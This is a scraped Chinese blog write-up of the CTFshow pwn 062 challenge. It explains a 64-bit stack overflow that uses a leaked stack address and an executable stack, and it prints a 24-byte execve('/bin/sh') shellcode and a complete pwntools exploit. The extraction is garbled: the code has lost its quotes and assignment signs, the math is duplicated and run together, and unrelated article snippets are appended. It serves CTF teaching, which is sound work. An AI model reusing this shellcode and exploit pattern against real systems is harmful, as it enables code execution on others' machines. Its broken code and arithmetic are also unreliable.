当前位置: 首页 > article >正文

【CTFshow-pwn系列】03_栈溢出【pwn 062】详解:受限缓冲区下的极简 Shellcode 注入与利用实战

本文仅用于技术研究禁止用于非法用途。Author: 枷锁在上一关pwn 061中我们利用程序主动泄露的栈基址通过gets函数毫无限制地在内存中挥洒 Payload。但 CTF 的竞技场绝不会永远如此慷慨。来到PWN 062题目描述只有一个冷酷的词“短了一点”。这短短四个字直接点破了本题的核心难点在极小的溢出空间内完成执行流劫持与 Shellcode 注入的极限博弈。题目信息与环境侦察1. 检查保护机制 (checksec)首先我们对二进制文件进行例行“体检”。~/Desktop .............................................................. at 21:15:00 checksec pwn [*] /home/shining/Desktop/pwn Arch: amd64-64-little -- 64 位 amd64 架构 RELRO: Partial RELRO Stack: No canary found -- 栈哨兵未开启允许溢出 NX: NX unknown - GNU_STACK missing -- 核心突破口栈权限为 RWX (可执行) PIE: PIE enabled -- 地址随机化开启基址动态变动 Stack: Executable RWX: Has RWX segments -- 确定存在可执行内存段 Stripped: No战术分析PIE 开启代码段基址不可预测我们不能硬编码任何跳转地址。NX 缺失这是我们唯一的生机。只要能获取到栈地址并成功跳转我们注入的指令就能被 CPU 执行。架构差异64 位环境下地址位宽8 字节和传参约定与 32 位完全不同必须严格遵守。第一部分代码审计与漏洞挖掘1. 静态分析 (IDA Pro)拖入 IDA 64-bit观察main函数逻辑int __fastcall main(int argc, const char **argv, const char **envp) { FILE *v3; // rdi _QWORD buf[2]; // [rsp0h] [rbp-10h] BYREF -- 缓冲区长度 16 字节 buf[0] 0; buf[1] 0; v3 stdout; setvbuf(stdout, 0, 1, 0); logo(v3, 0); puts(Welcome to CTFshow!); // 【关键信息泄露】打印 buf 数组在当前进程栈中的绝对地址 // 即使 PIE 开启这行输出也直接把栈的“底牌”翻给了我们 printf(Whats this : [%p] ?\n, buf); puts(Maybe its useful ! But how to use it?); // 【核心约束点】 // 此处使用 read 替代了 gets输入长度被严格限制为 0x3856 字节 read(0, buf, 0x38u); return 0; }漏洞分析缓冲区buf大小为 16 字节0x10。read长度0x3856 字节。溢出差值56−164056 - 16 4056−1640字节。虽然read比gets安全很多但这里的溢出空间依然足够我们覆盖掉返回地址。然而真正的挑战在于返回地址之后只剩下了极小的空间来存放 Shellcode。第二部分栈空间布局可视化与精准计算这是本题最硬核的部分。为了成功利用我们需要像裁缝一样在 56 字节的布料上裁剪出完美的补丁。1. 栈空间分布图 (64-bit Memory Layout)我们将 Payload 划分为三个阶段其在栈上的排布如下地址由低到高地址(相对buf) 栈内容可视化 大小 战术职能 -------------------------------------------------------------------------------- | buf0 | [ Shellcode 注入区 / 垃圾填充 ] | 16 Bytes | 承载缓冲区被溢出覆盖 | -------------------------------------------------------------------------------- | buf16 | [ Saved RBP (旧栈底指针) ] | 8 Bytes | 填充至返回地址的关键垫片 | -------------------------------------------------------------------------------- | buf24 | [ Return Address (返回地址) ] | 8 Bytes | 劫持点跳转至 buf_addr 32 | -------------------------------------------------------------------------------- | buf32 | [ 真正的极简 Shellcode ] | 24 Bytes | 程序的最终执行目标 | -------------------------------------------------------------------------------- | buf56 | [ read 截断边界 ] | 0 Bytes | read 停止读取溢出结束 | --------------------------------------------------------------------------------2. 为什么 Shellcode 只能是 24 字节Offset 计算16(buf)8(rbp)2416 (buf) 8 (rbp) 2416(buf)8(rbp)24字节到达返回地址前。RET 占用888字节存放我们要跳转的地址。空间消耗2483224 8 3224832字节。剩余可用长度56(read上限)−32(已消耗)2456 (read上限) - 32 (已消耗) \mathbf{24}56(read上限)−32(已消耗)24字节。在 64 位环境下常规的shellcraft.sh()产生的 Shellcode 长度通常在 44 到 48 字节之间。如果不进行精简Shellcode 会在中间被read强行截断导致程序崩溃。第三部分Tiny Shellcode 的艺术为了在 24 字节内完成execve(/bin/sh)系统调用每一行汇编都要经过极致的压榨。1. 核心逻辑拆解 (24 Bytes)这段经典的极简机器码巧妙地利用了push/pop指令的短字节特性和寄存器复用; \x6a\x3b push 0x3b; pop rax; ; rax 59 (execve 调用号) ; \x58 ; \x99 cdq; ; rdx 0 (前提是 rax 0) ; \x52 push rdx; ; 压入字符串结束符 \x00 ; \x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68 movabs rbx, 0x68732f6e69622f2f; ; \x53 push rbx; ; 将 //bin/sh 压入栈 ; \x54 push rsp; pop rdi; ; rdi 指向栈顶的 /bin/sh ; \x5f ; \x52 push rdx; push rsi; ; rsi NULL (参数数组) ; \x57 ; \x54 push rsp; pop rsi; ; \x5e ; \x0f\x05 syscall; ; 触发 64 位系统调用中断第四部分实战 EXP 编写与详解from pwn import * # 1. 基础配置 # 64 位题目必须指定 arch amd64否则 p64 等函数会报错 context(arch amd64, os linux, log_level debug) # 2. 动态环境选择逻辑 # 方便在本地调试 (python3 exp.py) 与远程攻击 (python3 exp.py REMOTE) 切换 if args[REMOTE]: io remote(pwn.challenge.ctf.show, 28200) # 请更新为最新分配的端口 else: io process(./pwn) # 3. 24 字节极简 Shellcode (寸土寸金不能多一个字节) shellcode_tiny b\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05 # 4. 地址泄露处理 # 程序打印格式Whats this : [0x7ffe...] ? io.recvuntil(b[) buf_addr_str io.recvuntil(b], dropTrue) buf_addr int(buf_addr_str, 16) success(f[*] 捕捉到动态栈基址{hex(buf_addr)}) # 5. 构造 Payload # 第一步填充 24 字节 (16字节buf 8字节rbp) padding bA * 24 # 第二步覆盖返回地址 # 跳转目标计算buf地址 24(垃圾填充) 8(返回地址自身) buf_addr 32 # 此时 RIP 会精准降落在我们放置 Shellcode 的位置 ret_addr p64(buf_addr 32) # 第三步拼接 Shellcode payload padding ret_addr shellcode_tiny # 6. 发送绝杀 # 注意本题 read 刚好读到 payload 结束使用 send 比 sendline 更稳妥 log.info(f[*] 发送 Payload总长度{len(payload)} 字节 (0x38)) io.send(payload) # 7. 拿 Shell io.interactive()第五部分核心知识点复盘1. 栈对齐原则 (Stack Alignment)在 64 位 Pwn 中偏移计算必须对齐到 8 字节。很多同学习惯了 32 位下的 4 字节偏移容易导致 Payload 在覆盖返回地址时产生错位从而引发Illegal Instruction。2. 约束边界感知拿到题目第一件事是计算“输入上限”。如果溢出空间 常用 Shellcode 长度就必须考虑寻找精简指令或使用ORW等高级技巧。3. PIE 绕过与稳定性虽然 PIE 开启了但程序主动泄露的栈地址是我们的“定海神针”。只要偏移不变我们就拥有了整张栈内存的“绝对坐标”。总结精简到极致的博弈pwn 062 向我们展示了在受限环境下的利用艺术。当常规的工具失效时对汇编底层的理解就是你手中最锋利的刀。宇宙级免责声明 重要声明本文仅供合法授权下的安全研究与教育目的1.合法授权本文所述技术仅适用于已获得明确书面授权的目标或自己的靶场内系统。未经授权的渗透测试、漏洞扫描或暴力破解行为均属违法可能导致法律后果包括但不限于刑事指控、民事诉讼及巨额赔偿。2.道德约束黑客精神的核心是建设而非破坏。请确保你的行为符合道德规范仅用于提升系统安全性而非恶意入侵、数据窃取或服务干扰。3.风险自担使用本文所述工具和技术时你需自行承担所有风险。作者及发布平台不对任何滥用、误用或由此引发的法律问题负责。4.合规性确保你的测试符合当地及国际法律法规如《计算机欺诈与滥用法案》CFAA、《通用数据保护条例》GDPR等。必要时咨询法律顾问。5.最小影响原则测试过程中应避免对目标系统造成破坏或服务中断。建议在非生产环境或沙箱环境中进行演练。6.数据保护不得访问、存储或泄露任何未授权的用户数据。如意外获取敏感信息应立即报告相关方并删除。7.免责范围作者、平台及关联方明确拒绝承担因读者行为导致的任何直接、间接、附带或惩罚性损害责任。 安全研究的正确姿势✅ 先授权再测试✅ 只针对自己拥有或有权测试的系统✅ 发现漏洞后及时报告并协助修复✅ 尊重隐私不越界⚠️ 警告技术无善恶人心有黑白。请明智选择你的道路。

相关文章:

【CTFshow-pwn系列】03_栈溢出【pwn 062】详解:受限缓冲区下的极简 Shellcode 注入与利用实战

本文仅用于技术研究,禁止用于非法用途。 Author: 枷锁 在上一关(pwn 061)中,我们利用程序主动泄露的栈基址,通过 gets 函数毫无限制地在内存中挥洒 Payload。但 CTF 的竞技场绝不会永远如此慷慨。 来到 PWN 062&#x…...

ToF传感器自适应距离滤波框架ToFFilter深度解析

1. ToFFilter 库深度解析:面向 ToF 传感器的自适应距离滤波框架Time-of-Flight(ToF)传感器,如 ST 的 VL53L0X、VL53L1X 及其后续型号,在工业测距、机器人避障、手势识别、液位监测等嵌入式场景中已成主流。然而&#x…...

第三节课总结

一、计算机中的单位1、比特位(bit):一个比特位只能放一个二进制数据,要么0要么12.字节(byte):一个字节 8个比特位1024byte 1KB1024KB 1MB1024MB 1GB1024GB 1T1024TB 1PB3.每一种数据类型都可…...

用例模型,分析模型,领域模型和数据模型比较

用例模型、分析模型、领域模型、数据模型比较 在软件工程和系统分析中,用例模型、分析模型、领域模型、数据模型分别服务于不同阶段和不同目的。理解它们的区别与联系,有助于系统分析师构建完整、一致的解决方案。 一、各模型核心定位 模型 英文 核心目标 主要视角 主要受众…...

2026届毕业生推荐的六大降AI率方案推荐

Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 要降低AIGC特征,得从语言习惯以及结构设计着手。别用常见的模板句式,…...

为什么Gartner刚下调3家明星厂商评级?AI原生数据库选型必须重看这7项硬指标,否则Q3上线即重构

第一章:Gartner评级下调背后的AI原生数据库范式转移 2026奇点智能技术大会(https://ml-summit.org) Gartner近期将多家传统关系型数据库厂商在“云数据库管理系统魔力象限”中的位置下调,其公开报告明确指出:“评估标准已从‘事务吞吐与SQL…...

Zabbix简介及部署

目录 一、Zabbix 核心介绍 1. 核心特性 2.核心组件(架构) 二、Zabbix 部署 步骤 1:系统初始化 步骤 2:服务器上部署zabbix-server 步骤 3:系统安装中文语言包 步骤 4:Web 界面初始化 步骤 5&#…...

AI驱动的软件文档闭环:从代码提交到API文档/PRD/测试用例自动生成(实测准确率92.6%,已交付37个生产系统)

第一章:AI原生软件研发文档自动化生成方案 2026奇点智能技术大会(https://ml-summit.org) AI原生软件研发正面临文档滞后、语义割裂与维护成本激增的三重挑战。传统文档生成依赖人工补全或静态模板,难以响应代码逻辑的实时演进;而AI驱动的文…...

【AI原生代码审查实战指南】:2026奇点大会首发的7大审查范式与3类高危漏洞自动拦截模型

第一章:2026奇点智能技术大会:AI原生代码审查 2026奇点智能技术大会(https://ml-summit.org) 在2026奇点智能技术大会上,“AI原生代码审查”不再作为辅助工具存在,而是深度嵌入软件开发生命周期的每个环节——从提交前的本地预检…...

N20 设备驱动程序

一、驱动程序驱动 内核的一部分,操作系统把硬件 “关起来”,只让驱动碰,应用程序只能通过系统调用访问。因为硬件不能直接给应用程序用,必须由操作系统统一管理,驱动就是操作系统跟硬件之间的翻译官。为应用层提供设备的操作方法…...

这个效率技巧,能找回你复制过的内容

很多人不知道,复制内容其实可以看历史记录。 也就是说,你复制过的内容,不一定只能保留最后一条。 Windows:系统自带 如果你用的是 Windows 10 / 11,系统已经内置了这个功能。 直接按:Win V 第一次使用…...

别再死磕Softmax了!清华黄高团队新作Agent Attention,让Transformer在高分辨率图像上也能飞起来

Agent Attention:突破Transformer高分辨率瓶颈的下一代注意力机制 当你在Stable Diffusion中生成一张4K图像时,是否遇到过显存爆满的尴尬?当用DeiT处理医学影像时,是否因计算资源不足而被迫降低分辨率?这些痛点背后&am…...

YOLOv8 智能交通违章检测 - 车牌识别与黑名单比对详解

YOLOv8 智能交通违章检测 - 车牌识别与黑名单比对详解 在交通违章检测系统中,车牌识别 (License Plate Recognition, LPR) 是锁定违法主体的关键,而黑名单比对则是实现自动预警和布控的核心业务逻辑。 本方案采用 YOLOv8 (车牌检测) + CRNN/LPRNet (字符识别) + 内存/Redis…...

文本三剑客命令手册

文本三剑客命令手册(grep、sed、awk) 一、grep — 文本搜索利器 基本语法 grep [选项] 模式 文件名常用选项 选项 说明 -i 忽略大小写 -v 反向匹配(显示不匹配的行) -n 显示匹配行的行号 -c 统计匹配行数 -l 只显示包含匹配的文件名 -L 只显示不包含匹配的文件名 -r / -R 递…...

使用ffmpeg本地发布rtmp/rtsp直播流

1 FFmpeg的选择与下载 选择合适的版本 首先,访问FFmpeg官方下载页面(https://ffmpeg.org/download.html),在这里可以找到最新的稳定版或 nightly 构建版本。对于大多数常规用途,推荐下载预编译的Windows静态版本&a…...

AI民主化:让每个人都能开发AI应用,是理想还是泡沫?

在人工智能(AI)技术飞速发展的今天,“AI民主化”已成为热门议题——它承诺让非专业开发者也能轻松创建AI应用,打破技术壁垒。然而,作为软件测试从业者,我们不禁要问:这究竟是推动创新的理想愿景…...

4、 说说webpack proxy工作原理?为什么能解决跨域?

目录 🌐 什么是 Webpack Proxy? 🧠 核心原理 为什么会有跨域问题? Proxy 如何解决跨域? 🔧 底层实现 请求转发流程 关键配置解析 changeOrigin: true 的作用 pathRewrite 的作用 🆚 与…...

ArcGIS JS 基础教程(1):地图初始化(含AMD/ESM两种引入方式)

ArcGIS JS 系列基础教程(100个项目常用热门功能) 一、地图基础操作 1. ArcGIS JS 基础教程(1):地图初始化(含AMD/ESM两种引入方式) 功能介绍:ArcGIS JS 开发的基础,实…...

别再只盯着Setup/Hold了!聊聊STA里Cell Delay和Net Delay那些‘反常’的负值现象

负延迟现象:STA中Cell Delay与Net Delay的深层解析 在数字集成电路设计中,静态时序分析(STA)是确保芯片功能正确性的关键环节。大多数工程师对Setup/Hold时间检查已经驾轻就熟,但当我们深入时序模型的细节时&#xff0…...

TS初相识

目录 前言: 关于TS 使用TS之前的环境搭配 TS的数据类型 number string null&undefined 根类型 数组类型 元组 函数类型 前言: js的缺点 错误出现的时机靠后 数据类型并不是连续的内存空间 js没有类型检测机制(弱类型&#…...

hybrid实验

拓扑分接口SW1SW2SW3配置IP地址池配置DHCP自动获取IPPC1PC2PC3PC4PC5PC6END...

别再死记硬背!用Multisim仿真带你直观理解TTL反相器的工作原理

用Multisim仿真拆解TTL反相器:从波形透视晶体管开关艺术 当你第一次在教科书上看到TTL反相器的原理图时,那些密密麻麻的三极管、电阻和二极管是否让你望而生畏?传统学习方式要求我们死记硬背各个工作区间的电压阈值和电流路径,但这…...

为什么SITS2026要求“AI能力必须嵌入主干流程”?——基于17家头部企业POC数据的因果链分析(含RPA+LLM耦合失效预警模型)

第一章:企业AI原生转型:SITS2026实战攻略 2026奇点智能技术大会(https://ml-summit.org) 企业AI原生转型已从战略构想进入规模化落地阶段。SITS2026(Smart Intelligent Transformation Summit 2026)提出“三阶跃迁”实践框架&…...

鹏哥c语言复习第十一讲----指针1基础概念

本文覆盖:内存与地址、指针变量、指针类型意义、指针运算,全是面试 考试必考点一、内存和地址(指针本质)内存被划分为一个个字节单元,每个单元有唯一编号,这个编号就是地址 指针。32 位机器:地…...

基本数据类型(小数/浮点数)

在Java中,表示小数的数据类型有两个:float和double。其中float占用4个字节,是单精度浮点数;double占用8个字节,是双精度浮点数。从字节数可以看出,double的存储范围更大。所谓精度,指的是小数点…...

AI代码审查革命性突破(2026奇点大会闭门报告首次公开):基于LLM+符号推理双轨架构的零误报审查框架

第一章:AI代码审查革命性突破(2026奇点大会闭门报告首次公开):基于LLM符号推理双轨架构的零误报审查框架 2026奇点智能技术大会(https://ml-summit.org) 传统静态分析工具长期受限于路径爆炸与语义盲区,误报率普遍高…...

【AI原生软件质量保障体系白皮书】:20年QE专家首度公开7大核心支柱与3层验证飞轮模型

第一章:AI原生软件质量保障体系的范式跃迁 2026奇点智能技术大会(https://ml-summit.org) 传统软件质量保障以确定性逻辑、静态代码审查和人工设计测试用例为核心,而AI原生软件——其核心组件包含大语言模型推理链、动态提示工程、向量检索模块与实时反…...

如何用BilibiliDown轻松下载B站视频:免费跨平台视频下载器终极指南

如何用BilibiliDown轻松下载B站视频:免费跨平台视频下载器终极指南 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader 😳 项目地址: https://gitcode.com/…...

STM32+FreeRTOS轻量级确定性以太网接口实现

1. 项目概述EthernetNetif_RSF是一个面向嵌入式实时系统的轻量级以太网网络接口(Netif)实现,专为基于 STM32 系列微控制器(特别是带 ETH 外设的型号,如 STM32F4/F7/H7)并运行 FreeRTOS 操作系统的平台设计。…...

IP地址什么?工业场景网络注意事项有哪些?信

OCP原则 ocp指开闭原则,对扩展开放,对修改关闭。是七大原则中最基本的一个原则。 依赖倒置原则(DIP) 什么是依赖倒置原则 核心是面向接口编程、面向抽象编程, 不是面向具体编程。 依赖倒置原则的目的 降低耦合度&#…...